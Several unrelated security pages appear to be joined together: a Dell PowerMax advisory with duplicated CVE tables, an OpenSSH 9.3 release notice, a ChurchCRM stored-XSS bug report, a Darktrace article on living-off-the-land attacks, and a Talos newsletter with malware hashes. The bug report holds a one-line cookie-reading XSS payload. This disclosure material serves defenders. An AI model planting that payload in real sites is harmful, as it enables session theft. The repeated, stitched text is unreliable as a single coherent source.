Dell EMC Unisphere for PowerMax versions before 9.1.0.27, Dell EMC Unisphere for PowerMax Virtual Appliance versions before 9.1.0.27, and PowerMax OS Release 5978 contain an improper certificate validation vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to carry out a man-in-the-middle attack by supplying a crafted certificate and intercepting the victim's traffic to view or modify a victim’s data in transit.

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVE**

**Description**

**CVSSBase Score**

**CVSS Vector String**

CVE-2021-21548

Dell EMC Unisphere for PowerMax versions before 9.1.0.27, Dell EMC Unisphere for PowerMax Virtual Appliance versions before 9.1.0.27, and PowerMax OS Release 5978 contain an improper certificate validation vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to carry out a man-in-the-middle attack by supplying a crafted certificate and intercepting the victim's traffic to view or modify a victim’s data in transit.  
**Note**: CVE-2021-21548 addresses incomplete fix for CVE-2020-5367. 

7.4

CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More information**

JQuery

CVE-2015-9251

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

sudo

CVE-2021-3156

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Oracle

CVE-2021-23841

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2021-3450

CVE-2021-2161

CVE-2021-2163

Internet Explorer 11

CVE-2020-17052

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2020-17053

 

CVE-2020-17058

 

Microsoft .NET

CVE-2020-16937

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Windows 10

CVE-2020-0764

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2020-1167

CVE-2020-1599

CVE-2020-16876

CVE-2020-16887

CVE-2020-16889

CVE-2020-16890

CVE-2020-16892

CVE-2020-16895

CVE-2020-16896

CVE-2020-16897

CVE-2020-16898

CVE-2020-16899

CVE-2020-16900

CVE-2020-16902

CVE-2020-16905

CVE-2020-16907

CVE-2020-16908

CVE-2020-16909

CVE-2020-16910

CVE-2020-16911

CVE-2020-16912

CVE-2020-16913

CVE-2020-16914

CVE-2020-16915

CVE-2020-16916

CVE-2020-16919

CVE-2020-16920

CVE-2020-16921

CVE-2020-16922

CVE-2020-16923

CVE-2020-16924

CVE-2020-16927

CVE-2020-16935

CVE-2020-16936

CVE-2020-16939

CVE-2020-16940

CVE-2020-16958

CVE-2020-16959

CVE-2020-16960

CVE-2020-16961

CVE-2020-16962

CVE-2020-16963

CVE-2020-16964

CVE-2020-16967

CVE-2020-16968

CVE-2020-16972

CVE-2020-16973

CVE-2020-16974

CVE-2020-16975

CVE-2020-16976

CVE-2020-16997

CVE-2020-16998

CVE-2020-16999

CVE-2020-17000

CVE-2020-17001

CVE-2020-17004

CVE-2020-17007

CVE-2020-17011

CVE-2020-17013

CVE-2020-17014

CVE-2020-17022

CVE-2020-17024

CVE-2020-17025

CVE-2020-17026

CVE-2020-17027

CVE-2020-17028

CVE-2020-17029

CVE-2020-17030

CVE-2020-17031

CVE-2020-17032

CVE-2020-17033

CVE-2020-17034

CVE-2020-17035

CVE-2020-17036

CVE-2020-17037

CVE-2020-17038

CVE-2020-17041

CVE-2020-17042

CVE-2020-17043

CVE-2020-17044

CVE-2020-17045

CVE-2020-17046

CVE-2020-17047

CVE-2020-17055

CVE-2020-17056

CVE-2020-17057

CVE-2020-17068

CVE-2020-17069

CVE-2020-17070

CVE-2020-17071

CVE-2020-17075

CVE-2020-17077

CVE-2020-17087

CVE-2020-17088

CVE-2020-17090

CVE-2020-17092

CVE-2020-17094

CVE-2020-17096

CVE-2020-17097

CVE-2020-17098

CVE-2020-17099

CVE-2020-17103

CVE-2020-17113

CVE-2020-17134

CVE-2020-17136

CVE-2020-17139

CVE-2020-17140

CVE-2021-1637

CVE-2021-1638

CVE-2021-1642

CVE-2021-1645

CVE-2021-1646

CVE-2021-1648

CVE-2021-1649

CVE-2021-1650

CVE-2021-1651

CVE-2021-1652

CVE-2021-1653

CVE-2021-1654

CVE-2021-1655

CVE-2021-1656

CVE-2021-1657

CVE-2021-1658

CVE-2021-1659

CVE-2021-1660

CVE-2021-1661

CVE-2021-1662

CVE-2021-1664

CVE-2021-1665

CVE-2021-1666

CVE-2021-1667

CVE-2021-1668

CVE-2021-1669

CVE-2021-1671

CVE-2021-1672

CVE-2021-1673

CVE-2021-1674

CVE-2021-1676

CVE-2021-1678

CVE-2021-1679

CVE-2021-1680

CVE-2021-1681

CVE-2021-1682

CVE-2021-1683

CVE-2021-1684

CVE-2021-1685

CVE-2021-1686

CVE-2021-1687

CVE-2021-1688

CVE-2021-1689

CVE-2021-1690

CVE-2021-1693

CVE-2021-1694

CVE-2021-1695

CVE-2021-1696

CVE-2021-1697

CVE-2021-1699

CVE-2021-1700

CVE-2021-1701

CVE-2021-1702

CVE-2021-1706

CVE-2021-1708

CVE-2021-1709

CVE-2021-1710

**Proprietary Code CVE**

**Description**

**CVSSBase Score**

**CVSS Vector String**

CVE-2021-21548

Dell EMC Unisphere for PowerMax versions before 9.1.0.27, Dell EMC Unisphere for PowerMax Virtual Appliance versions before 9.1.0.27, and PowerMax OS Release 5978 contain an improper certificate validation vulnerability. An unauthenticated remote attacker may potentially exploit this vulnerability to carry out a man-in-the-middle attack by supplying a crafted certificate and intercepting the victim's traffic to view or modify a victim’s data in transit.  
**Note**: CVE-2021-21548 addresses incomplete fix for CVE-2020-5367. 

7.4

CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

 

**Third-party Component**

**CVEs**

**More information**

JQuery

CVE-2015-9251

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

sudo

CVE-2021-3156

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Oracle

CVE-2021-23841

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2021-3450

CVE-2021-2161

CVE-2021-2163

Internet Explorer 11

CVE-2020-17052

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2020-17053

 

CVE-2020-17058

 

Microsoft .NET

CVE-2020-16937

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

Windows 10

CVE-2020-0764

See NVD (http://nvd.nist.gov/) for individual scores for each CVE

CVE-2020-1167

CVE-2020-1599

CVE-2020-16876

CVE-2020-16887

CVE-2020-16889

CVE-2020-16890

CVE-2020-16892

CVE-2020-16895

CVE-2020-16896

CVE-2020-16897

CVE-2020-16898

CVE-2020-16899

CVE-2020-16900

CVE-2020-16902

CVE-2020-16905

CVE-2020-16907

CVE-2020-16908

CVE-2020-16909

CVE-2020-16910

CVE-2020-16911

CVE-2020-16912

CVE-2020-16913

CVE-2020-16914

CVE-2020-16915

CVE-2020-16916

CVE-2020-16919

CVE-2020-16920

CVE-2020-16921

CVE-2020-16922

CVE-2020-16923

CVE-2020-16924

CVE-2020-16927

CVE-2020-16935

CVE-2020-16936

CVE-2020-16939

CVE-2020-16940

CVE-2020-16958

CVE-2020-16959

CVE-2020-16960

CVE-2020-16961

CVE-2020-16962

CVE-2020-16963

CVE-2020-16964

CVE-2020-16967

CVE-2020-16968

CVE-2020-16972

CVE-2020-16973

CVE-2020-16974

CVE-2020-16975

CVE-2020-16976

CVE-2020-16997

CVE-2020-16998

CVE-2020-16999

CVE-2020-17000

CVE-2020-17001

CVE-2020-17004

CVE-2020-17007

CVE-2020-17011

CVE-2020-17013

CVE-2020-17014

CVE-2020-17022

CVE-2020-17024

CVE-2020-17025

CVE-2020-17026

CVE-2020-17027

CVE-2020-17028

CVE-2020-17029

CVE-2020-17030

CVE-2020-17031

CVE-2020-17032

CVE-2020-17033

CVE-2020-17034

CVE-2020-17035

CVE-2020-17036

CVE-2020-17037

CVE-2020-17038

CVE-2020-17041

CVE-2020-17042

CVE-2020-17043

CVE-2020-17044

CVE-2020-17045

CVE-2020-17046

CVE-2020-17047

CVE-2020-17055

CVE-2020-17056

CVE-2020-17057

CVE-2020-17068

CVE-2020-17069

CVE-2020-17070

CVE-2020-17071

CVE-2020-17075

CVE-2020-17077

CVE-2020-17087

CVE-2020-17088

CVE-2020-17090

CVE-2020-17092

CVE-2020-17094

CVE-2020-17096

CVE-2020-17097

CVE-2020-17098

CVE-2020-17099

CVE-2020-17103

CVE-2020-17113

CVE-2020-17134

CVE-2020-17136

CVE-2020-17139

CVE-2020-17140

CVE-2021-1637

CVE-2021-1638

CVE-2021-1642

CVE-2021-1645

CVE-2021-1646

CVE-2021-1648

CVE-2021-1649

CVE-2021-1650

CVE-2021-1651

CVE-2021-1652

CVE-2021-1653

CVE-2021-1654

CVE-2021-1655

CVE-2021-1656

CVE-2021-1657

CVE-2021-1658

CVE-2021-1659

CVE-2021-1660

CVE-2021-1661

CVE-2021-1662

CVE-2021-1664

CVE-2021-1665

CVE-2021-1666

CVE-2021-1667

CVE-2021-1668

CVE-2021-1669

CVE-2021-1671

CVE-2021-1672

CVE-2021-1673

CVE-2021-1674

CVE-2021-1676

CVE-2021-1678

CVE-2021-1679

CVE-2021-1680

CVE-2021-1681

CVE-2021-1682

CVE-2021-1683

CVE-2021-1684

CVE-2021-1685

CVE-2021-1686

CVE-2021-1687

CVE-2021-1688

CVE-2021-1689

CVE-2021-1690

CVE-2021-1693

CVE-2021-1694

CVE-2021-1695

CVE-2021-1696

CVE-2021-1697

CVE-2021-1699

CVE-2021-1700

CVE-2021-1701

CVE-2021-1702

CVE-2021-1706

CVE-2021-1708

CVE-2021-1709

CVE-2021-1710

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Unisphere for PowerMax

Versions before 9.1.0.27

9.1.0.27

EEM: 9.1.0.856

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

Unisphere for PowerMax Virtual Appliance

Versions before 9.1.0.27

9.1.0.27

EEM: 9.1.0.856

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

Unisphere for PowerMax

Versions before 9.2.1.8

9.2.1.8

EEM: 9.2.1.187

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

Unisphere for PowerMax Virtual Appliance

Versions before 9.2.1.8

9.2.1.8

EEM: 9.2.1.187

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

Solutions Enabler

Versions before 9.1.0.16

9.1.0.16

EEM: 9.1.0.856

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

Solutions Enabler Virtual Appliance

Versions before 9.1.0.16

9.1.0.16

EEM: 9.1.0.856

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

Solutions Enabler

Versions before 9.2.1.2

9.2.1.2

EEM: 9.2.1.187

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

Solutions Enabler Virtual Appliance

Versions before 9.2.1.2

9.2.1.2

EEM: 9.2.1.187

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

PowerMax OS

5978

5978

Request OPT 583679 for Foxtail SR and Hickory SR  
 

**Notes:**

*   CVE-2020-5367 was not fully addressed in the Dell EMC Unisphere for PowerMax versions prior to 9.1.0.17.
*   DSA-2021-134 addresses the improper certificate validation vulnerability in the Dell EMC Unisphere for PowerMax version 9.1.0.27(CVE-2021-21548).
*   Dell EMC highly recommends all users upgrade Dell EMC Unisphere for PowerMax to version 9.1.0.27 at their earliest opportunity.

**Product**

**Affected Versions**

**Updated Versions**

**Link to Update**

Unisphere for PowerMax

Versions before 9.1.0.27

9.1.0.27

EEM: 9.1.0.856

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

Unisphere for PowerMax Virtual Appliance

Versions before 9.1.0.27

9.1.0.27

EEM: 9.1.0.856

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

Unisphere for PowerMax

Versions before 9.2.1.8

9.2.1.8

EEM: 9.2.1.187

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

Unisphere for PowerMax Virtual Appliance

Versions before 9.2.1.8

9.2.1.8

EEM: 9.2.1.187

https://www.dell.com/support/home/product-support/product/unisphere-powermax/drivers

Solutions Enabler

Versions before 9.1.0.16

9.1.0.16

EEM: 9.1.0.856

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

Solutions Enabler Virtual Appliance

Versions before 9.1.0.16

9.1.0.16

EEM: 9.1.0.856

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

Solutions Enabler

Versions before 9.2.1.2

9.2.1.2

EEM: 9.2.1.187

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

Solutions Enabler Virtual Appliance

Versions before 9.2.1.2

9.2.1.2

EEM: 9.2.1.187

https://www.dell.com/support/home/product-support/product/solutions-enabler/drivers

PowerMax OS

5978

5978

Request OPT 583679 for Foxtail SR and Hickory SR  
 

**Notes:**

*   CVE-2020-5367 was not fully addressed in the Dell EMC Unisphere for PowerMax versions prior to 9.1.0.17.
*   DSA-2021-134 addresses the improper certificate validation vulnerability in the Dell EMC Unisphere for PowerMax version 9.1.0.27(CVE-2021-21548).
*   Dell EMC highly recommends all users upgrade Dell EMC Unisphere for PowerMax to version 9.1.0.27 at their earliest opportunity.

**Kiitokset**

CVE-2021-21548: Dell would like to thank Thorsten Tüllmann for reporting the Unisphere for PowerMax certificate validation issue.  
 

**Versiohistoria**

**Revision**

**Date**

**Description**

1.0

2021-07-22

Initial release: Q2 2021 Security Release for PowerMax Foxtail SR and Hickory SR releases.

2.0

2021-10-04

 Version update and Note in CVE Description added. Affected Products and Remediation updated with details concerning, Note: CVE-2021-21548 addresses incomplete fix for CVE-2020-5367.   
 

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

PowerMax, PowerMax 2000, PowerMax 8000, Product Security Information, Solutions Enabler, Solutions Enabler Series, Unisphere for PowerMax

04 lokak. 2021

CVE-2021-21548: DSA-2021-134: Dell EMC Unisphere for PowerMax, Dell EMC Unisphere for PowerMax Virtual Appliance, Dell EMC Solutions Enabler Virtual Appliance, and Dell EMC PowerMax Embedded Management Security Updat

ssh-add in OpenSSH before 9.3 adds smartcard keys to ssh-agent without the intended per-hop destination constraints.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 15 Mar 2023 17:18:38 -0600 (MDT)
From: Damien Miller <djm@....openbsd.org>
To: oss-security@...ts.openwall.com
Subject: Announce: OpenSSH 9.3 released

OpenSSH 9.3 has just been released. It will be available from the
mirrors listed at https://www.openssh.com/ shortly.

OpenSSH is a 100% complete SSH protocol 2.0 implementation and
includes sftp client and server support.

Once again, we would like to thank the OpenSSH community for their
continued support of the project, especially those who contributed
code or patches, reported bugs, tested snapshots or donated to the
project. More information on donations may be found at:
https://www.openssh.com/donations.html

Changes since OpenSSH 9.2
=========================

This release fixes a number of security bugs.

Security
========

This release contains fixes for a security problem and a memory
safety problem. The memory safety problem is not believed to be
exploitable, but we report most network-reachable memory faults as
security bugs.

 \* ssh-add(1): when adding smartcard keys to ssh-agent(1) with the
   per-hop desination constraints (ssh-add -h ...) added in OpenSSH
   8.9, a logic error prevented the constraints from being
   communicated to the agent. This resulted in the keys being added
   without constraints. The common cases of non-smartcard keys and
   keys without destination constraints are unaffected. This problem
   was reported by Luci Stanescu.

 \* ssh(1): Portable OpenSSH provides an implementation of the
   getrrsetbyname(3) function if the standard library does not
   provide it, for use by the VerifyHostKeyDNS feature. A
   specifically crafted DNS response could cause this function to
   perform an out-of-bounds read of adjacent stack data, but this
   condition does not appear to be exploitable beyond denial-of-
   service to the ssh(1) client.

   The getrrsetbyname(3) replacement is only included if the system's
   standard library lacks this function and portable OpenSSH was not
   compiled with the ldns library (--with-ldns). getrrsetbyname(3) is
   only invoked if using VerifyHostKeyDNS to fetch SSHFP records. This
   problem was found by the Coverity static analyzer.

New features
------------

 \* ssh-keygen(1), ssh-keyscan(1): accept -Ohashalg=sha1|sha256 when
   outputting SSHFP fingerprints to allow algorithm selection. bz3493
    
 \* sshd(8): add a \`sshd -G\` option that parses and prints the
   effective configuration without attempting to load private keys
   and perform other checks. This allows usage of the option before
   keys have been generated and for configuration evaluation and
   verification by unprivileged users.

Bugfixes
--------

 \* scp(1), sftp(1): fix progressmeter corruption on wide displays;
   bz3534

 \* ssh-add(1), ssh-keygen(1): use RSA/SHA256 when testing usability
   of private keys as some systems are starting to disable RSA/SHA1
   in libcrypto.

 \* sftp-server(8): fix a memory leak. GHPR363

 \* ssh(1), sshd(8), ssh-keyscan(1): remove vestigal protocol
   compatibility code and simplify what's left.

 \* Fix a number of low-impact Coverity static analysis findings.
   These include several reported via bz2687

 \* ssh\_config(5), sshd\_config(5): mention that some options are not
   first-match-wins.

 \* Rework logging for the regression tests. Regression tests will now
   capture separate logs for each ssh and sshd invocation in a test.

 \* ssh(1): make \`ssh -Q CASignatureAlgorithms\` work as the manpage
   says it should; bz3532.

 \* ssh(1): ensure that there is a terminating newline when adding a
   new entry to known\_hosts; bz3529

Portability
-----------

 \* sshd(8): harden Linux seccomp sandbox. Move to an allowlist of
   mmap(2), madvise(2) and futex(2) flags, removing some concerning
   kernel attack surface.

 \* sshd(8): improve Linux seccomp-bpf sandbox for older systems;
   bz3537

Checksums:
==========

- SHA1 (openssh-9.3.tar.gz) = 5f9d2f73ddfe94f3f0a78bdf46704b6ad7b66ec7
- SHA256 (openssh-9.3.tar.gz) = eRcXkFZByz70DUBUcyIdvU0pVxP2X280FrmV8pyUdrk=

- SHA1 (openssh-9.3p1.tar.gz) = 610959871bf8d6baafc3525811948f85b5dd84ab
- SHA256 (openssh-9.3p1.tar.gz) = 6bq6dwGnalHz2Fpiw4OjydzZf6kAuFm8fbEUwYaK+Kg=

Please note that the SHA256 signatures are base64 encoded and not
hexadecimal (which is the default for most checksum tools). The PGP
key used to sign the releases is available from the mirror sites:
https://cdn.openbsd.org/pub/OpenBSD/OpenSSH/RELEASE\_KEY.asc

Reporting Bugs:
===============

- Please read https://www.openssh.com/report.html
  Security bugs should be reported directly to openssh@...nssh.com

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2023-28531: security - Announce: OpenSSH 9.3 released

A cross-site scripting (XSS) vulnerability in the Edit Group function of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Edit Group Name text field.

**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**

**On what page in the application did you find this issue?****On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

windows

**What browser (and version) are you running?**

Edge

**What version of PHP is the server running?**

7.4.3

**What version of SQL Server are you running?**

5.7.26

**What version of ChurchCRM are you running?**

4.5.3

Severity: middle

Description:  
A stored XSS was found in the application editing group name, where malicious JS or HTML code can be inserted, allowing attackers to steal sensitive information, hijack user sessions, or perform other malicious operations on behalf of the victim. This vulnerability is caused by the lack of effective encoding processing of input and output in the background.

Impact:  
Stored XSS, also known as persistent XSS, is a type of cross-site scripting attack in which the malicious code is permanently stored on the server and delivered to every user who accesses the affected page. The attacker typically injects the malicious code, such as JavaScript or HTML, into a form field or other input field that is stored in a database or other data storage location. When the victim accesses the page containing the stored malicious code, the code is executed in the victim's browser, allowing the attacker to steal sensitive information, hijack user sessions, or perform other malicious actions on behalf of the victim.

Affected Component:  
/churchcrm/GroupList.php

Technical Details:  
The vulnerability is caused by the failure of the backend to effectively validate user input. An attacker can insert malicious js code and store it in the database, allowing the attacker to steal sensitive information, hijack user sessions, or perform other malicious operations on behalf of the victim.

Proof of Concept (PoC):  
<img src=1 onclick=alert(document.cookie)>  
  
The vulnerability will trigger when another user visits the page  

Remediation:  
1.Input validation: All user input should be validated on the server-side to ensure that it conforms to the expected format and does not contain any malicious code. Input validation should be performed on both client-side and server-side, and should be designed to detect and block any attempts to inject scripts or other malicious content.  
2.Output encoding: All data that is displayed on a web page should be properly encoded to prevent script injection. This includes data stored in a database or other data storage location, as well as data that is passed between pages or included in page templates. Proper encoding can include HTML entity encoding, URL encoding, or JavaScript escaping, depending on the specific context and data being displayed.

CVE-2023-27059: A cross-site scripting vulnerability (XSS) exists in the edit group function · Issue #6450 · ChurchCRM/CRM

Attackers are increasingly staying under the radar by using your own tools against you. Only behavioral AI can catch these stealthy attacks.

The most advanced cyberattackers try to look like your administrators, abusing legitimate credentials, using legitimate system binaries or tools that are natively utilized in the victim's environment. These "living-off-the-land' (LotL) cyberattacks continue to cause headaches for security teams, which often have no effective means of differentiating between malicious behavior and legitimate administrative behavior.

When an attacker uses applications and services native to your environment, your own staff also use these systems, and a signature- or rules-based detection system will either miss the activity or end up alerting or disrupting your own employees' actions.

It is no surprise then that these attacks have been found to be highly effective, with the Ponemon Institute finding that fileless malware attacks are about 10 times more likely to succeed than file-based attacks.

LotL cyberattackers rely on a variety of tools and techniques, including:

*   **Using PowerShell** to launch malicious scripts, escalate privileges, install backdoors, create new tasks on remote machines, identify configuration settings, evade defences, exfiltrate data, access Active Directory information, and more
*   Using **Windows Command Processor (CMD.exe)**, to run batch scripts, and **(WScript.exe) and Console Based Script Host (CScript.exe)** to execute Visual Basic scripts, offering them more automation.
*   **.NET applications** for resource installation via the .NET Framework. Installutil.exe allows attackers to execute untrusted code via the trusted program
*   Using the **Registry Console Tool (reg.exe)** to maintain persistence, store settings for malware, and store executables in subkeys.
*   And many others, including **WMI (Windows Management Instrumentation), Service Control Manager Configuration Tool (sc.exe), Scheduled Tasks (AT.EXE Process)**, and Sysinternals such as **PSExec**.

LotL techniques involving Remote Desktop Protocol (RDP) connections can be some of the most difficult activities to triage for security teams, as RDP often represents a critical service for system administrators. For security teams, it can be exceptionally difficult to parse through and identify which RDP connections are legitimate and which are not, especially when administrative credentials are involved.

Defensive systems focused on "known bads" and historical attack data fail to catch the malicious use of some of the tools described above. Stopping these attacks requires a business-centric defensive strategy that uses AI to understand "normal" behavior of every user and device in your organization to detect anomalous activity in real time.

Take, for example, this real-world attack that targeted a Darktrace customer in July 2022.

    

Figure 1: A timeline of the attack. Source: Darktrace

The first sign of a compromise was observed when Darktrace's AI revealed an internal workstation and domain controller (DC) engaging in unusual scanning activity, before the DC made an outbound connection to a suspicious endpoint that was highly rare for the environment. The contents of this connection revealed that the threat actor was exporting passwords from a successful cracking attempt via Mimikatz — a presence that previously had been unknown to the security team.

Several devices then began initiating outbound connections to AnyDesk-related websites, a possible means of persistence or a backdoor for the attacker. In their first demonstration of LotL methods, the attacker initiated a "golden ticket attack" culminating in new admin logins. With their new position of privilege, use of the automating "ITaskSchedulerService" and Hydra brute-force tool the next day allowed for even deeper insights and enumeration of the customer's environment.

One device even remotely induced a living-off-the-land binary (LOLBin) attack. By creating and running a new service on three different destinations, the attacker retrieved MiniDump memory contents and feed any information of interest back through Mimikatz. Not only can this strategy be used to identify further passwords, but it allows for lateral movement via code executions and new file operations such as downloading or moving.

On the final day, a new DC was seen engaging in an uncommonly high volume of outbound calls to the DCE-RPC operations "samr" and "srvsvc" (both of which are legitimate WMI services). Later, the DC responsible for the initial compromise began engaging in outbound SSH connections to a rare endpoint and uploading significant volumes of data over multiple connections.

    

Figure 2: Darktrace's Device Event Log reveals some of the LotL techniques used by the attacker

The attacker's use of legitimate and widely used tools throughout this attack meant the attack flew under the radar of the rest of the security teams' stack, but Darktrace's AI stitched together multiple anomalies indicative of an attack and revealed the full scope of the incident to the security team, with every stage of the attack outlined.

This technology can go further than just threat detection. Its understanding of what's "normal" for the business allows it to initiate a targeted response, containing only the malicious activity. In this case, this autonomous response functionality was not configured, but the customer turned it on soon after. Even so, the security team was able to use the information gathered by Darktrace to contain the attack and prevent any further data exfiltration or mission success.

LotL attacks are proving successful for attackers and are unlikely to go away as a result. For this reason, security teams are increasingly moving away from "legacy" defenses and toward AI that understands "'normal" for everyone and everything in the business to shine a light on the subtle anomalies that comprise a cyberattack — even if that attack relies primarily on legitimate tools.

**About the Author**

    

Tony Jarvis is Director of Enterprise Security, Asia-Pacific and Japan, at Darktrace. Tony is a seasoned cybersecurity strategist who has advised Fortune 500 companies around the world on best practice for managing cyber-risk. He has counseled governments, major banks, and multinational companies, and his comments on cybersecurity and the rising threat to critical national infrastructure have been reported in local and international media including CNBC, Channel News Asia, and The Straits Times. Tony holds a BA in Information Systems from the University of Melbourne.

Leveraging Behavioral Analysis to Catch Living-Off-the-Land Attacks

The latest episode of ThreatWise TV from Hazel Burton is the closest look yet at the team Talos assembled in the days after Russia invaded Ukraine.

Thursday, March 16, 2023 14:03

Welcome to this week’s edition of the Threat Source newsletter.

We’re written a ton about Cisco Talos’ support of Ukraine and our friends and allies there. Now, we encourage you to watch and listen to the folks who have been working hands-on there.

The latest episode of ThreatWise TV from Hazel Burton is the closest look yet at the team Talos assembled in the days after Russia invaded Ukraine to help defend critical infrastructure, intelligence partners and government agencies in Ukraine. You can watch the full documentary above, or over on YouTube here.

**The one big thing**

We have new research out on a never-before-seen threat actor called YoroTrooper that’s carrying out a variety of espionage activity in Europe and Asia. This group has targeted several high-profile government organizations, including one in the European Union, stealing sensitive information such as login credentials, browser histories and cookies, system information and screenshots.

**Why do I care?**

While YoroTrooper uses malware associated with other threat actors, such as PoetRAT and LodaRAT, we believe this is a new cluster of activity from an entirely new threat actor. YoroTrooper is clearly going after major targets and has already been successful, so everyone should be on the lookout for these attacks, but especially users and organizations in Commonwealth of Independent States (CIS) countries.

**So now what?**

YoroTrooper creates malicious domains and spoofs commonly visited URLs that look like they belong to government agencies in the targeted countries to host its malware. So any time you go to open an email attachment or click on a link in an email, triple check to make sure it’s really where you want to go, or that you can verify the sender. Additionally, the blog outlines a range of protections in Cisco Secure products that can defend and detect this group’s actions.

**Top security headlines of the week**

The APLHV ransomware cartel claims to have **successfully stolen data belonging to Amazon’s Ring smart home company.** The ransomware gang’s dark website threatened to leak the data earlier this week, though it showed no evidence of a successful attack. Ring said on Tuesday that it had “no indications that Ring has experienced a ransomware event.” ALPHV, which is known for the BlackCat malware, usually encrypts targets’ data and threatens to leak the stolen information if the victim does not pay the requested ransom payment. Politico also reported this week that Ring will openly share recorded footage with local law enforcement, even if the camera’s user declines to do so, sparking questions about who owns security footage on private property and whether users are compelled to share those recordings. (Vice, TechCrunch, Politico)

Sensitive information from D.C. Health Link — the online health insurance marketplace for Washington, D.C. — is **reportedly for sale on the dark web,** potentially affecting White House staff and members of Congress. An internal memo last week warned of a "significant data breach” that potentially exposed the personal information of thousands of federal employees and warned potential victims that their data may have been compromised. As many as 21 members from the U.S. House and Senate could be affected, all of whom get their insurance through the program. In all, 56,415 customers were affected, according to the exchange. (CBS News, Roll Call)

Microsoft **released its monthly security update Tuesday,** disclosing 83 vulnerabilities across the company’s hardware and software line, including two issues that are actively being exploited in the wild, continuing a trend of zero-days appearing in Patch Tuesdays over the past few months. Two of the vulnerabilities included in March’s security update have been exploited in the wild, according to Microsoft, including one critical issue. One of the zero-days included this month, CVE-2023-23397, is a privilege escalation vulnerability in Microsoft Outlook that could force a targeted device to connect to a remote URL and transmit the Windows account's Net-NTLMv2 hash to an adversary. To trigger this vulnerability, a user doesn’t even need to open the email or preview it, the vulnerability is triggered as soon as the email is retrieved by the targeted email server. (Cisco Talos, SecurityWeek)

**Can’t get enough Talos?**

*   Talos Takes Ep. #130: There’s not actually more spam during tax season, just different spam
*   Researcher Spotlight: How David Liebenberg went from never having opened Terminal to hunting international APTs
*   YoroTrooper cyberspies target CIS energy orgs, EU embassies
*   YoroTrooper Espionage Campaigns Target CIS, EU Countries
*   Updated Prometei botnet evades defenses, mines Monero

**Upcoming events where you can find Talos**

**WiCyS (March 16 - 18)**

Denver, CO

**RSA (April 24 - 27)**

San Francisco, CA

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
